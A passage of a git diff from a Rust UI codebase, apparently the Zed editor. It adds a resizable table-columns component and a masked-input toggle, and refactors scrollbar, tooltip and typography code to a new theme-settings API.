+ }), ) .when_some(self.description, |this, description| { - this.child(Label::new(description).color(Color::Muted).mb_2()) + this.child(Label::new(description).color(Color::Muted).mb_2().flex_1()) }), ) - .when(self.show_dismiss_button, |this| { - this.child( - IconButton::new("dismiss", IconName::Close) - .shape(IconButtonShape::Square) - .on_click(|_, window, cx| { - window.dispatch_action(menu::Cancel.boxed_clone(), cx); - }), - ) - }) } } diff --git a/crates/ui/src/components/redistributable_columns.rs b/crates/ui/src/components/redistributable_columns.rs new file mode 100644 index 0000000000000000000000000000000000000000..cd22c31e19736e72e5d88676178053b49a3e65fd --- /dev/null +++ b/crates/ui/src/components/redistributable_columns.rs @@ -0,0 +1,485 @@ +use std::rc::Rc; + +use gpui::{ + AbsoluteLength, AppContext as _, Bounds, DefiniteLength, DragMoveEvent, Empty, Entity, Length, + WeakEntity, +}; +use itertools::intersperse_with; + +use super::data_table::table_row::{IntoTableRow as _, TableRow}; +use crate::{ + ActiveTheme as _, AnyElement, App, Context, Div, FluentBuilder as _, InteractiveElement, + IntoElement, ParentElement, Pixels, StatefulInteractiveElement, Styled, Window, div, h_flex, + px, +}; + +const RESIZE_COLUMN_WIDTH: f32 = 8.0; +const RESIZE_DIVIDER_WIDTH: f32 = 1.0; + +#[derive(Debug)] +struct DraggedColumn(usize); + +#[derive(Debug, Copy, Clone, PartialEq)] +pub enum TableResizeBehavior { + None, + Resizable, + MinSize(f32), +} + +impl TableResizeBehavior { + pub fn is_resizable(&self) -> bool { + *self != TableResizeBehavior::None + } + + pub fn min_size(&self) -> Option { + match self { + TableResizeBehavior::None => None, + TableResizeBehavior::Resizable => Some(0.05), + TableResizeBehavior::MinSize(min_size) => Some(*min_size), + } + } +} + +#[derive(Clone)] +pub struct HeaderResizeInfo { + pub columns_state: WeakEntity, + pub resize_behavior: TableRow, +} + +impl HeaderResizeInfo { + pub fn from_state(columns_state: &Entity, cx: &App) -> Self { + let resize_behavior = columns_state.read(cx).resize_behavior().clone(); + Self { + columns_state: columns_state.downgrade(), + resize_behavior, + } + } +} + +pub struct RedistributableColumnsState { + pub(crate) initial_widths: TableRow, + pub(crate) committed_widths: TableRow, + pub(crate) preview_widths: TableRow, + pub(crate) resize_behavior: TableRow, + pub(crate) cached_container_width: Pixels, +} + +impl RedistributableColumnsState { + pub fn new( + cols: usize, + initial_widths: Vec>, + resize_behavior: Vec, + ) -> Self { + let widths: TableRow = initial_widths + .into_iter() + .map(Into::into) + .collect::>() + .into_table_row(cols); + Self { + initial_widths: widths.clone(), + committed_widths: widths.clone(), + preview_widths: widths, + resize_behavior: resize_behavior.into_table_row(cols), + cached_container_width: Default::default(), + } + } + + pub fn cols(&self) -> usize { + self.committed_widths.cols() + } + + pub fn initial_widths(&self) -> &TableRow { + &self.initial_widths + } + + pub fn preview_widths(&self) -> &TableRow { + &self.preview_widths + } + + pub fn resize_behavior(&self) -> &TableRow { + &self.resize_behavior + } + + pub fn widths_to_render(&self) -> TableRow { + self.preview_widths.map_cloned(Length::Definite) + } + + pub fn preview_fractions(&self, rem_size: Pixels) -> TableRow { + if self.cached_container_width > px(0.) { + self.preview_widths + .map_ref(|length| Self::get_fraction(length, self.cached_container_width, rem_size)) + } else { + self.preview_widths.map_ref(|length| match length { + DefiniteLength::Fraction(fraction) => *fraction, + DefiniteLength::Absolute(_) => 0.0, + }) + } + } + + pub fn preview_column_width(&self, column_index: usize, window: &Window) -> Option { + let width = self.preview_widths().as_slice().get(column_index)?; + match width { + DefiniteLength::Fraction(fraction) if self.cached_container_width > px(0.) => { + Some(self.cached_container_width * *fraction) + } + DefiniteLength::Fraction(_) => None, + DefiniteLength::Absolute(AbsoluteLength::Pixels(pixels)) => Some(*pixels), + DefiniteLength::Absolute(AbsoluteLength::Rems(rems_width)) => { + Some(rems_width.to_pixels(window.rem_size())) + } + } + } + + pub fn cached_container_width(&self) -> Pixels { + self.cached_container_width + } + + pub fn set_cached_container_width(&mut self, width: Pixels) { + self.cached_container_width = width; + } + + pub fn commit_preview(&mut self) { + self.committed_widths = self.preview_widths.clone(); + } + + pub fn reset_column_to_initial_width(&mut self, column_index: usize, window: &Window) { + let bounds_width = self.cached_container_width; + if bounds_width <= px(0.) { + return; + } + + let rem_size = window.rem_size(); + let initial_sizes = self + .initial_widths + .map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); + let widths = self + .committed_widths + .map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); + + let updated_widths = + Self::reset_to_initial_size(column_index, widths, initial_sizes, &self.resize_behavior); + self.committed_widths = updated_widths.map(DefiniteLength::Fraction); + self.preview_widths = self.committed_widths.clone(); + } + + fn get_fraction(length: &DefiniteLength, bounds_width: Pixels, rem_size: Pixels) -> f32 { + match length { + DefiniteLength::Absolute(AbsoluteLength::Pixels(pixels)) => *pixels / bounds_width, + DefiniteLength::Absolute(AbsoluteLength::Rems(rems_width)) => { + rems_width.to_pixels(rem_size) / bounds_width + } + DefiniteLength::Fraction(fraction) => *fraction, + } + } + + pub(crate) fn reset_to_initial_size( + col_idx: usize, + mut widths: TableRow, + initial_sizes: TableRow, + resize_behavior: &TableRow, + ) -> TableRow { + let diff = initial_sizes[col_idx] - widths[col_idx]; + + let left_diff = + initial_sizes[..col_idx].iter().sum::() - widths[..col_idx].iter().sum::(); + let right_diff = initial_sizes[col_idx + 1..].iter().sum::() + - widths[col_idx + 1..].iter().sum::(); + + let go_left_first = if diff < 0.0 { + left_diff > right_diff + } else { + left_diff < right_diff + }; + + if !go_left_first { + let diff_remaining = + Self::propagate_resize_diff(diff, col_idx, &mut widths, resize_behavior, 1); + + if diff_remaining != 0.0 && col_idx > 0 { + Self::propagate_resize_diff( + diff_remaining, + col_idx, + &mut widths, + resize_behavior, + -1, + ); + } + } else { + let diff_remaining = + Self::propagate_resize_diff(diff, col_idx, &mut widths, resize_behavior, -1); + + if diff_remaining != 0.0 { + Self::propagate_resize_diff( + diff_remaining, + col_idx, + &mut widths, + resize_behavior, + 1, + ); + } + } + + widths + } + + fn on_drag_move( + &mut self, + drag_event: &DragMoveEvent, + window: &mut Window, + cx: &mut Context, + ) { + let drag_position = drag_event.event.position; + let bounds = drag_event.bounds; + let bounds_width = bounds.right() - bounds.left(); + if bounds_width <= px(0.) { + return; + } + + let mut col_position = 0.0; + let rem_size = window.rem_size(); + let col_idx = drag_event.drag(cx).0; + + let divider_width = Self::get_fraction( + &DefiniteLength::Absolute(AbsoluteLength::Pixels(px(RESIZE_DIVIDER_WIDTH))), + bounds_width, + rem_size, + ); + + let mut widths = self + .committed_widths + .map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); + + for length in widths[0..=col_idx].iter() { + col_position += length + divider_width; + } + + let mut total_length_ratio = col_position; + for length in widths[col_idx + 1..].iter() { + total_length_ratio += length; + } + let cols = self.resize_behavior.cols(); + total_length_ratio += (cols - 1 - col_idx) as f32 * divider_width; + + let drag_fraction = (drag_position.x - bounds.left()) / bounds_width; + let drag_fraction = drag_fraction * total_length_ratio; + let diff = drag_fraction - col_position - divider_width / 2.0; + + Self::drag_column_handle(diff, col_idx, &mut widths, &self.resize_behavior); + + self.preview_widths = widths.map(DefiniteLength::Fraction); + } + + pub(crate) fn drag_column_handle( + diff: f32, + col_idx: usize, + widths: &mut TableRow, + resize_behavior: &TableRow, + ) { + if diff > 0.0 { + Self::propagate_resize_diff(diff, col_idx, widths, resize_behavior, 1); + } else { + Self::propagate_resize_diff(-diff, col_idx + 1, widths, resize_behavior, -1); + } + } + + pub(crate) fn propagate_resize_diff( + diff: f32, + col_idx: usize, + widths: &mut TableRow, + resize_behavior: &TableRow, + direction: i8, + ) -> f32 { + let mut diff_remaining = diff; + if resize_behavior[col_idx].min_size().is_none() { + return diff; + } + + let step_right; + let step_left; + if direction < 0 { + step_right = 0; + step_left = 1; + } else { + step_right = 1; + step_left = 0; + } + if col_idx == 0 && direction < 0 { + return diff; + } + let mut curr_column = col_idx + step_right - step_left; + + while diff_remaining != 0.0 && curr_column < widths.cols() { + let Some(min_size) = resize_behavior[curr_column].min_size() else { + if curr_column == 0 { + break; + } + curr_column -= step_left; + curr_column += step_right; + continue; + }; + + let curr_width = widths[curr_column] - diff_remaining; + widths[curr_column] = curr_width; + + if min_size > curr_width { + diff_remaining = min_size - curr_width; + widths[curr_column] = min_size; + } else { + diff_remaining = 0.0; + break; + } + if curr_column == 0 { + break; + } + curr_column -= step_left; + curr_column += step_right; + } + widths[col_idx] = widths[col_idx] + (diff - diff_remaining); + + diff_remaining + } +} + +pub fn bind_redistributable_columns( + container: Div, + columns_state: Entity, +) -> Div { + container + .on_drag_move::({ + let columns_state = columns_state.clone(); + move |event, window, cx| { + columns_state.update(cx, |columns, cx| { + columns.on_drag_move(event, window, cx); + }); + } + }) + .on_children_prepainted({ + let columns_state = columns_state.clone(); + move |bounds, _, cx| { + if let Some(width) = child_bounds_width(&bounds) { + columns_state.update(cx, |columns, _| { + columns.set_cached_container_width(width); + }); + } + } + }) + .on_drop::(move |_, _, cx| { + columns_state.update(cx, |columns, _| { + columns.commit_preview(); + }); + }) +} + +pub fn render_redistributable_columns_resize_handles( + columns_state: &Entity, + window: &mut Window, + cx: &mut App, +) -> AnyElement { + let (column_widths, resize_behavior) = { + let state = columns_state.read(cx); + (state.widths_to_render(), state.resize_behavior().clone()) + }; + + let mut column_ix = 0; + let resize_behavior = Rc::new(resize_behavior); + let dividers = intersperse_with( + column_widths + .as_slice() + .iter() + .copied() + .map(|width| resize_spacer(width).into_any_element()), + || { + let current_column_ix = column_ix; + let resize_behavior = Rc::clone(&resize_behavior); + let columns_state = columns_state.clone(); + column_ix += 1; + + window.with_id(current_column_ix, |window| { + let mut resize_divider = div() + .id(current_column_ix) + .relative() + .top_0() + .w(px(RESIZE_DIVIDER_WIDTH)) + .h_full() + .bg(cx.theme().colors().border.opacity(0.8)); + + let mut resize_handle = div() + .id("column-resize-handle") + .absolute() + .left_neg_0p5() + .w(px(RESIZE_COLUMN_WIDTH)) + .h_full(); + + if resize_behavior[current_column_ix].is_resizable() { + let is_highlighted = window.use_state(cx, |_window, _cx| false); + + resize_divider = resize_divider.when(*is_highlighted.read(cx), |div| { + div.bg(cx.theme().colors().border_focused) + }); + + resize_handle = resize_handle + .on_hover({ + let is_highlighted = is_highlighted.clone(); + move |&was_hovered, _, cx| is_highlighted.write(cx, was_hovered) + }) + .cursor_col_resize() + .on_click({ + let columns_state = columns_state.clone(); + move |event, window, cx| { + if event.click_count() >= 2 { + columns_state.update(cx, |columns, _| { + columns.reset_column_to_initial_width( + current_column_ix, + window, + ); + }); + } + + cx.stop_propagation(); + } + }) + .on_drag(DraggedColumn(current_column_ix), { + let is_highlighted = is_highlighted.clone(); + move |_, _offset, _window, cx| { + is_highlighted.write(cx, true); + cx.new(|_cx| Empty) + } + }) + .on_drop::(move |_, _, cx| { + is_highlighted.write(cx, false); + columns_state.update(cx, |state, _| { + state.commit_preview(); + }); + }); + } + + resize_divider.child(resize_handle).into_any_element() + }) + }, + ); + + h_flex() + .id("resize-handles") + .absolute() + .inset_0() + .w_full() + .children(dividers) + .into_any_element() +} + +fn resize_spacer(width: Length) -> Div { + div().w(width).h_full() +} + +fn child_bounds_width(bounds: &[Bounds]) -> Option { + let first_bounds = bounds.first()?; + let mut left = first_bounds.left(); + let mut right = first_bounds.right(); + + for bound in bounds.iter().skip(1) { + left = left.min(bound.left()); + right = right.max(bound.right()); + } + + Some(right - left) +} diff --git a/crates/ui/src/components/scrollbar.rs b/crates/ui/src/components/scrollbar.rs index 8e8e89be9c0580a7820685b5690a996dfd2dade0..86f5e3b4ccbe80dd340cbeafb52ed499bb79895a 100644 --- a/crates/ui/src/components/scrollbar.rs +++ b/crates/ui/src/components/scrollbar.rs @@ -9,16 +9,15 @@ use gpui::{ Along, App, AppContext as _, Axis as ScrollbarAxis, BorderStyle, Bounds, ContentMask, Context, Corner, Corners, CursorStyle, DispatchPhase, Div, Edges, Element, ElementId, Entity, EntityId, GlobalElementId, Hitbox, HitboxBehavior, Hsla, InteractiveElement, IntoElement, IsZero, - LayoutId, ListState, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Negate, - ParentElement, Pixels, Point, Position, Render, ScrollHandle, ScrollWheelEvent, Size, Stateful, + LayoutId, ListState, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, ParentElement, + Pixels, Point, Position, Render, ScrollHandle, ScrollWheelEvent, Size, Stateful, StatefulInteractiveElement, Style, Styled, Task, UniformListDecoration, UniformListScrollHandle, Window, ease_in_out, prelude::FluentBuilder as _, px, quad, relative, size, }; -use settings::SettingsStore; +use gpui_util::ResultExt; use smallvec::SmallVec; use theme::ActiveTheme as _; -use util::ResultExt; use std::ops::Range; @@ -34,7 +33,6 @@ pub mod scrollbars { use gpui::{App, Global}; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; - use settings::Settings; /// When to show the scrollbar in the editor. /// @@ -54,28 +52,7 @@ pub mod scrollbars { Never, } - impl From for ShowScrollbar { - fn from(value: settings::ShowScrollbar) -> Self { - match value { - settings::ShowScrollbar::Auto => ShowScrollbar::Auto, - settings::ShowScrollbar::System => ShowScrollbar::System, - settings::ShowScrollbar::Always => ShowScrollbar::Always, - settings::ShowScrollbar::Never => ShowScrollbar::Never, - } - } - } - - pub trait GlobalSetting { - fn get_value(cx: &App) -> &Self; - } - - impl GlobalSetting for T { - fn get_value(cx: &App) -> &T { - T::get_global(cx) - } - } - - pub trait ScrollbarVisibility: GlobalSetting + 'static { + pub trait ScrollbarVisibility: 'static { fn visibility(&self, cx: &App) -> ShowScrollbar; } @@ -103,11 +80,9 @@ where let element_id = config.id.take().unwrap_or_else(|| caller_location.into()); let track_color = config.track_color; - let state = window.use_keyed_state(element_id, cx, |window, cx| { + let state = window.use_keyed_state(element_id, cx, |_, cx| { let parent_id = cx.entity_id(); - ScrollbarStateWrapper( - cx.new(|cx| ScrollbarState::new_from_config(config, parent_id, window, cx)), - ) + ScrollbarStateWrapper(cx.new(|cx| ScrollbarState::new_from_config(config, parent_id, cx))) }); state.update(cx, |state, cx| { @@ -258,7 +233,7 @@ impl UniformListDecoration for ScrollbarStateWrapper { _cx: &mut App, ) -> gpui::AnyElement { ScrollbarElement { - origin: scroll_offset.negate(), + origin: -scroll_offset, state: self.0.clone(), } .into_any() @@ -399,8 +374,8 @@ impl Scrollbars { Self::new_with_setting(show_along, |_| ShowScrollbar::Always) } - pub fn for_settings() -> Scrollbars { - Scrollbars::new_with_setting(ScrollAxes::Both, |cx| S::get_value(cx).visibility(cx)) + pub fn for_settings() -> Scrollbars { + Scrollbars::new_with_setting(ScrollAxes::Both, |cx| S::default().visibility(cx)) } } @@ -589,6 +564,16 @@ enum ParentHoverEvent { Outside, } +pub fn on_new_scrollbars(cx: &mut App) { + cx.observe_new::(|_, window, cx| { + if let Some(window) = window { + cx.observe_global_in::(window, ScrollbarState::settings_changed) + .detach(); + } + }) + .detach(); +} + /// This is used to ensure notifies within the state do not notify the parent /// unintentionally. struct ScrollbarStateWrapper(Entity>); @@ -611,15 +596,7 @@ struct ScrollbarState { } impl ScrollbarState { - fn new_from_config( - config: Scrollbars, - parent_id: EntityId, - window: &mut Window, - cx: &mut Context, - ) -> Self { - cx.observe_global_in::(window, Self::settings_changed) - .detach(); - + fn new_from_config(config: Scrollbars, parent_id: EntityId, cx: &mut Context) -> Self { let (manually_added, scroll_handle) = match config.scrollable_handle { Handle::Tracked(handle) => (true, handle), Handle::Untracked(func) => (false, func()), @@ -911,7 +888,7 @@ impl ThumbState { } impl ScrollableHandle for UniformListScrollHandle { - fn max_offset(&self) -> Size { + fn max_offset(&self) -> Point { self.0.borrow().base_handle.max_offset() } @@ -929,7 +906,7 @@ impl ScrollableHandle for UniformListScrollHandle { } impl ScrollableHandle for ListState { - fn max_offset(&self) -> Size { + fn max_offset(&self) -> Point { self.max_offset_for_scrollbar() } @@ -955,7 +932,7 @@ impl ScrollableHandle for ListState { } impl ScrollableHandle for ScrollHandle { - fn max_offset(&self) -> Size { + fn max_offset(&self) -> Point { self.max_offset() } @@ -973,7 +950,7 @@ impl ScrollableHandle for ScrollHandle { } pub trait ScrollableHandle: 'static + Any + Sized + Clone { - fn max_offset(&self) -> Size; + fn max_offset(&self) -> Point; fn set_offset(&self, point: Point); fn offset(&self) -> Point; fn viewport(&self) -> Bounds; @@ -984,7 +961,7 @@ pub trait ScrollableHandle: 'static + Any + Sized + Clone { self.max_offset().along(axis) > Pixels::ZERO } fn content_size(&self) -> Size { - self.viewport().size + self.max_offset() + self.viewport().size + self.max_offset().into() } } @@ -1006,7 +983,7 @@ impl ScrollbarLayout { fn compute_click_offset( &self, event_position: Point, - max_offset: Size, + max_offset: Point, event_type: ScrollbarMouseEvent, ) -> Pixels { let Self { @@ -1041,7 +1018,18 @@ impl ScrollbarLayout { impl PartialEq for ScrollbarLayout { fn eq(&self, other: &Self) -> bool { - self.axis == other.axis && self.thumb_bounds == other.thumb_bounds + if self.axis != other.axis { + return false; + } + + let axis = self.axis; + let thumb_offset = + self.thumb_bounds.origin.along(axis) - self.track_bounds.origin.along(axis); + let other_thumb_offset = + other.thumb_bounds.origin.along(axis) - other.track_bounds.origin.along(axis); + + thumb_offset == other_thumb_offset + && self.thumb_bounds.size.along(axis) == other.thumb_bounds.size.along(axis) } } diff --git a/crates/ui/src/components/toggle.rs b/crates/ui/src/components/toggle.rs index 86ff1d8eff8691a2610a4a7e2268aaf47502e306..0b1d7884687b5a3f95c1d54d6a357c4425326f58 100644 --- a/crates/ui/src/components/toggle.rs +++ b/crates/ui/src/components/toggle.rs @@ -2,7 +2,6 @@ use gpui::{ AnyElement, AnyView, ClickEvent, ElementId, Hsla, IntoElement, KeybindingKeystroke, Keystroke, Styled, Window, div, hsla, prelude::*, }; -use settings::KeybindSource; use std::{rc::Rc, sync::Arc}; use crate::utils::is_light; @@ -1051,7 +1050,7 @@ impl Component for Switch { Keystroke::parse("cmd-s").unwrap(), )] .into(), - KeybindSource::Base, + false, ))) .into_any_element(), )], diff --git a/crates/ui/src/components/tooltip.rs b/crates/ui/src/components/tooltip.rs index 8b4ff3f73163f38e19da80462e687db3d88efc6f..8124b4ecbafdc6b096e91892741fe774e3ba032f 100644 --- a/crates/ui/src/components/tooltip.rs +++ b/crates/ui/src/components/tooltip.rs @@ -1,12 +1,9 @@ use std::borrow::Borrow; use std::rc::Rc; -use gpui::{Action, AnyElement, AnyView, AppContext, FocusHandle, IntoElement, Render}; -use settings::Settings; -use theme::ThemeSettings; - use crate::prelude::*; use crate::{Color, KeyBinding, Label, LabelSize, StyledExt, h_flex, v_flex}; +use gpui::{Action, AnyElement, AnyView, AppContext, FocusHandle, IntoElement, Render}; #[derive(RegisterComponent)] pub struct Tooltip { @@ -221,7 +218,7 @@ where C: AppContext + Borrow, { let app = (*cx).borrow(); - let ui_font = ThemeSettings::get_global(app).ui_font.clone(); + let ui_font = theme::theme_settings(app).ui_font(app).clone(); // padding to avoid tooltip appearing right below the mouse cursor div().pl_2().pt_2p5().child( diff --git a/crates/ui/src/components/tree_view_item.rs b/crates/ui/src/components/tree_view_item.rs index c96800223d9328779a2e71194a31315e1d57c175..f6d90fceff5bf93cb2d3bd6bdda75c8593399f54 100644 --- a/crates/ui/src/components/tree_view_item.rs +++ b/crates/ui/src/components/tree_view_item.rs @@ -139,12 +139,17 @@ impl RenderOnce for TreeViewItem { let focused_border = cx.theme().colors().border_focused; let item_size = rems_from_px(28.); - let indentation_line = h_flex().size(item_size).flex_none().justify_center().child( - div() - .w_px() - .h_full() - .bg(cx.theme().colors().border.opacity(0.5)), - ); + let indentation_line = h_flex() + .h(item_size) + .w(px(22.)) + .flex_none() + .justify_center() + .child( + div() + .w_px() + .h_full() + .bg(cx.theme().colors().border.opacity(0.5)), + ); h_flex() .id(self.id) @@ -156,6 +161,9 @@ impl RenderOnce for TreeViewItem { .cursor_pointer() .size_full() .h(item_size) + .pl_0p5() + .pr_1() + .gap_2() .rounded_sm() .border_1() .border_color(transparent_border) @@ -168,30 +176,24 @@ impl RenderOnce for TreeViewItem { let label = self.label; if self.root_item { - this.px_1() - .gap_2p5() - .child( - Disclosure::new("toggle", self.expanded) - .when_some( - self.on_toggle.clone(), - |disclosure, on_toggle| { - disclosure.on_toggle_expanded(on_toggle) - }, - ) - .opened_icon(IconName::ChevronDown) - .closed_icon(IconName::ChevronRight), - ) - .child( - Label::new(label) - .when(!self.selected, |this| this.color(Color::Muted)), - ) + this.child( + Disclosure::new("toggle", self.expanded) + .when_some(self.on_toggle.clone(), |disclosure, on_toggle| { + disclosure.on_toggle_expanded(on_toggle) + }) + .opened_icon(IconName::ChevronDown) + .closed_icon(IconName::ChevronRight), + ) + .child( + Label::new(label) + .when(!self.selected, |this| this.color(Color::Muted)), + ) } else { this.child(indentation_line).child( h_flex() .id("nested_inner_tree_view_item") .w_full() .flex_grow() - .px_1() .child( Label::new(label) .when(!self.selected, |this| this.color(Color::Muted)), diff --git a/crates/ui/src/styles/spacing.rs b/crates/ui/src/styles/spacing.rs index c6629f5d8829b2ebd59a80a2a22c033ab8c389f6..50d5446ebc25826e6c0665e906141d77ba78d584 100644 --- a/crates/ui/src/styles/spacing.rs +++ b/crates/ui/src/styles/spacing.rs @@ -1,6 +1,5 @@ use gpui::{App, Pixels, Rems, px, rems}; -use settings::Settings; -use theme::{ThemeSettings, UiDensity}; +use theme::UiDensity; use ui_macros::derive_dynamic_spacing; // Derives [DynamicSpacing]. See [ui_macros::derive_dynamic_spacing]. @@ -51,5 +50,5 @@ derive_dynamic_spacing![ /// /// Always use [DynamicSpacing] for spacing values. pub fn ui_density(cx: &mut App) -> UiDensity { - ThemeSettings::get_global(cx).ui_density + theme::theme_settings(cx).ui_density(cx) } diff --git a/crates/ui/src/styles/typography.rs b/crates/ui/src/styles/typography.rs index 2bb0b35720be715251bc7c11a139a1fccfaf6035..69790d3d3dae6bbc8728a63af806357a276ed67a 100644 --- a/crates/ui/src/styles/typography.rs +++ b/crates/ui/src/styles/typography.rs @@ -3,8 +3,7 @@ use gpui::{ AnyElement, App, IntoElement, ParentElement, Rems, RenderOnce, SharedString, Styled, Window, div, rems, }; -use settings::Settings; -use theme::{ActiveTheme, ThemeSettings}; +use theme::ActiveTheme; use crate::{Color, rems_from_px}; @@ -12,16 +11,16 @@ use crate::{Color, rems_from_px}; pub trait StyledTypography: Styled + Sized { /// Sets the font family to the buffer font. fn font_buffer(self, cx: &App) -> Self { - let settings = ThemeSettings::get_global(cx); - let buffer_font_family = settings.buffer_font.family.clone(); + let settings = theme::theme_settings(cx); + let buffer_font_family = settings.buffer_font(cx).family.clone(); self.font_family(buffer_font_family) } /// Sets the font family to the UI font. fn font_ui(self, cx: &App) -> Self { - let settings = ThemeSettings::get_global(cx); - let ui_font_family = settings.ui_font.family.clone(); + let settings = theme::theme_settings(cx); + let ui_font_family = settings.ui_font(cx).family.clone(); self.font_family(ui_font_family) } @@ -82,7 +81,7 @@ pub trait StyledTypography: Styled + Sized { /// This should only be used for text that is displayed in a buffer, /// or other places that text needs to match the user's buffer font size. fn text_buffer(self, cx: &App) -> Self { - let settings = ThemeSettings::get_global(cx); + let settings = theme::theme_settings(cx); self.text_size(settings.buffer_font_size(cx)) } } @@ -133,28 +132,28 @@ pub enum TextSize { impl TextSize { /// Returns the text size in rems. pub fn rems(self, cx: &App) -> Rems { - let theme_settings = ThemeSettings::get_global(cx); + let settings = theme::theme_settings(cx); match self { Self::Large => rems_from_px(16.), Self::Default => rems_from_px(14.), Self::Small => rems_from_px(12.), Self::XSmall => rems_from_px(10.), - Self::Ui => rems_from_px(theme_settings.ui_font_size(cx)), - Self::Editor => rems_from_px(theme_settings.buffer_font_size(cx)), + Self::Ui => rems_from_px(settings.ui_font_size(cx)), + Self::Editor => rems_from_px(settings.buffer_font_size(cx)), } } pub fn pixels(self, cx: &App) -> Pixels { - let theme_settings = ThemeSettings::get_global(cx); + let settings = theme::theme_settings(cx); match self { Self::Large => px(16.), Self::Default => px(14.), Self::Small => px(12.), Self::XSmall => px(10.), - Self::Ui => theme_settings.ui_font_size(cx), - Self::Editor => theme_settings.buffer_font_size(cx), + Self::Ui => settings.ui_font_size(cx), + Self::Editor => settings.buffer_font_size(cx), } } } @@ -212,7 +211,7 @@ pub struct Headline { impl RenderOnce for Headline { fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { - let ui_font = ThemeSettings::get_global(cx).ui_font.clone(); + let ui_font = theme::theme_settings(cx).ui_font(cx).clone(); div() .font(ui_font) diff --git a/crates/ui/src/utils.rs b/crates/ui/src/utils.rs index b73915162f9e6be937af7323e95fb9d6a82d6c52..d88bf4a45e0b54536b6f5ca5ad4ae7c7fe936937 100644 --- a/crates/ui/src/utils.rs +++ b/crates/ui/src/utils.rs @@ -23,3 +23,36 @@ pub use with_rem_size::*; pub fn is_light(cx: &mut App) -> bool { cx.theme().appearance.is_light() } + +/// Returns the platform-appropriate label for the "reveal in file manager" action. +pub fn reveal_in_file_manager_label(is_remote: bool) -> &'static str { + if cfg!(target_os = "macos") && !is_remote { + "Reveal in Finder" + } else if cfg!(target_os = "windows") && !is_remote { + "Reveal in File Explorer" + } else { + "Reveal in File Manager" + } +} + +/// Capitalizes the first character of a string. +/// +/// This function takes a string slice as input and returns a new `String` with the first character +/// capitalized. +/// +/// # Examples +/// +/// ``` +/// use ui::utils::capitalize; +/// +/// assert_eq!(capitalize("hello"), "Hello"); +/// assert_eq!(capitalize("WORLD"), "WORLD"); +/// assert_eq!(capitalize(""), ""); +/// ``` +pub fn capitalize(str: &str) -> String { + let mut chars = str.chars(); + match chars.next() { + None => String::new(), + Some(first_char) => first_char.to_uppercase().collect::() + chars.as_str(), + } +} diff --git a/crates/ui_input/src/input_field.rs b/crates/ui_input/src/input_field.rs index 59a05497627838364b4037c44b236ab70c2b3c6b..16932b58e87cb9df83c14919b79bd048f33275fe 100644 --- a/crates/ui_input/src/input_field.rs +++ b/crates/ui_input/src/input_field.rs @@ -3,6 +3,7 @@ use component::{example_group, single_example}; use gpui::{App, FocusHandle, Focusable, Hsla, Length}; use std::sync::Arc; +use ui::Tooltip; use ui::prelude::*; use crate::ErasedEditor; @@ -38,6 +39,8 @@ pub struct InputField { tab_index: Option, /// Whether this field is a tab stop (can be focused via Tab key). tab_stop: bool, + /// Whether the field content is masked (for sensitive fields like passwords or API keys). + masked: Option, } impl Focusable for InputField { @@ -63,6 +66,7 @@ impl InputField { min_width: px(192.).into(), tab_index: None, tab_stop: true, + masked: None, } } @@ -96,6 +100,12 @@ impl InputField { self } + /// Sets this field as a masked/sensitive input (e.g., for passwords or API keys). + pub fn masked(mut self, masked: bool) -> Self { + self.masked = Some(masked); + self + } + pub fn is_empty(&self, cx: &App) -> bool { self.editor().text(cx).trim().is_empty() } @@ -115,12 +125,20 @@ impl InputField { pub fn set_text(&self, text: &str, window: &mut Window, cx: &mut App) { self.editor().set_text(text, window, cx) } + + pub fn set_masked(&self, masked: bool, window: &mut Window, cx: &mut App) { + self.editor().set_masked(masked, window, cx) + } } impl Render for InputField { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { let editor = self.editor.clone(); + if let Some(masked) = self.masked { + self.editor.set_masked(masked, window, cx); + } + let theme_color = cx.theme().colors(); let style = InputFieldStyle { @@ -172,7 +190,31 @@ impl Render for InputField { this.gap_1() .child(Icon::new(icon).size(IconSize::Small).color(Color::Muted)) }) - .child(self.editor.render(window, cx)), + .child(self.editor.render(window, cx)) + .when_some(self.masked, |this, is_masked| { + this.child( + IconButton::new( + "toggle-masked", + if is_masked { + IconName::Eye + } else { + IconName::EyeOff + }, + ) + .icon_size(IconSize::Small) + .icon_color(Color::Muted) + .tooltip(Tooltip::text(if is_masked { "Show" } else { "Hide" })) + .on_click(cx.listener( + |this, _, window, cx| { + if let Some(ref mut masked) = this.masked { + *masked = !*masked; + this.editor.set_masked(*masked, window, cx); + cx.notify(); + } + }, + )), + ) + }), ) } } diff --git a/crates/ui_macros/src/dynamic_spacing.rs b/crates/ui_macros/src/dynamic_spacing.rs index 15ba3e241ec43d02b83e4143eb620505a0a2f02e..f1207f5487a89f0afbd23e620da4c4cf4172be9a 100644 --- a/crates/ui_macros/src/dynamic_spacing.rs +++ b/crates/ui_macros/src/dynamic_spacing.rs @@ -65,7 +65,7 @@ pub fn derive_spacing(input: TokenStream) -> TokenStream { DynamicSpacingValue::Single(n) => { let n = n.base10_parse::().unwrap(); quote! { - DynamicSpacing::#variant => match ThemeSettings::get_global(cx).ui_density { + DynamicSpacing::#variant => match ::theme::theme_settings(cx).ui_density(cx) { ::theme::UiDensity::Compact => (#n - 4.0).max(0.0) / BASE_REM_SIZE_IN_PX, ::theme::UiDensity::Default => #n / BASE_REM_SIZE_IN_PX, ::theme::UiDensity::Comfortable => (#n + 4.0) / BASE_REM_SIZE_IN_PX, @@ -77,7 +77,7 @@ pub fn derive_spacing(input: TokenStream) -> TokenStream { let b = b.base10_parse::().unwrap(); let c = c.base10_parse::().unwrap(); quote! { - DynamicSpacing::#variant => match ThemeSettings::get_global(cx).ui_density { + DynamicSpacing::#variant => match ::theme::theme_settings(cx).ui_density(cx) { ::theme::UiDensity::Compact => #a / BASE_REM_SIZE_IN_PX, ::theme::UiDensity::Default => #b / BASE_REM_SIZE_IN_PX, ::theme::UiDensity::Comfortable => #c / BASE_REM_SIZE_IN_PX, @@ -157,7 +157,7 @@ pub fn derive_spacing(input: TokenStream) -> TokenStream { /// Returns the spacing value in pixels. pub fn px(&self, cx: &App) -> Pixels { - let ui_font_size_f32: f32 = ThemeSettings::get_global(cx).ui_font_size(cx).into(); + let ui_font_size_f32: f32 = 